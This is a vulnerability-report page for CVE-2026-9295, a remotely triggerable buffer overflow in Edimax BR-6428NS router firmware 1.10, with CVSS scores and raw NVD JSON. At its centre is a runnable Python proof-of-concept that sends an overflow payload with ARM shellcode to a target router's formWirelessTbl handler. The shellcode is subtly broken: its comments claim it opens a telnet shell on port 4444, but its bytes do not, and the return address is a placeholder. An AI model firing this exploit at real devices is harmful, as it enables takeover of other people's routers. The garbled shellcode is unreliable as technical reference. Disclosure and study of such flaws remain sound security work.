Security Vulnerability Report
中文
CVE-2026-9295 CVSS 8.8 HIGH

CVE-2026-9295

Published: 2026-05-23 08:16:28
Last Modified: 2026-05-26 19:37:00

Description

A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Edimax BR-6428NS firmware 1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def exploit_cve_2026_9295(target_ip, target_port=80): """ CVE-2026-9295 PoC - Edimax BR-6428NS formWirelessTbl Buffer Overflow Target: Edimax BR-6428NS firmware 1.10 Vulnerability: Stack buffer overflow in /goform/formWirelessTbl vapurl parameter """ # Construct malicious payload # Buffer size is typically 256-512 bytes on embedded devices # We need to overflow and overwrite the return address buffer_size = 600 # Padding to fill the buffer padding = b'A' * 264 # Overwrite saved registers (if needed) saved_regs = b'B' * 16 # Overwrite return address with NOP sled + shellcode address # For ARM architecture, use little-endian address # This is a placeholder - actual address depends on firmware version return_addr = b'\x00\x10\x00\x00' # Example: 0x00100000 (adjust based on firmware) # Simple ARM shellcode - executes telnetd # This spawns a shell on port 4444 shellcode = ( b'\x01\x30\x8f\xe2' # add r3, pc, #1 b'\x13\xff\x2f\xe1' # bx r3 b'/bin/sh\x00' # /bin/sh string ) # NOP sled for reliability nop_sled = b'\x00\xf0\x20\xe3' * 20 # ARM NOP instruction payload = padding + saved_regs + nop_sled + shellcode + return_addr # Construct the POST request url = f"http://{target_ip}:{target_port}/goform/formWirelessTbl" data = { 'vapurl': payload.decode('latin-1'), 'submit': 'Apply' } print(f"[*] Sending exploit to {url}") print(f"[*] Payload size: {len(payload)} bytes") try: response = requests.post(url, data=data, timeout=10) print(f"[*] Response status: {response.status_code}") except requests.exceptions.Timeout: print("[+] Request timed out - target may be vulnerable and crashed") except requests.exceptions.ConnectionError: print("[+] Connection refused - target may be down or already exploited") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_cve_2026_9295(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9295", "sourceIdentifier": "[email protected]", "published": "2026-05-23T08:16:28.483", "lastModified": "2026-05-26T19:37:00.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6428NS-formWirelessTbl-34b53a41781f80a89cadcc9b5293086e?source=copy_link", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811534", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365242", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365242/cti", "source": "[email protected]"}]}}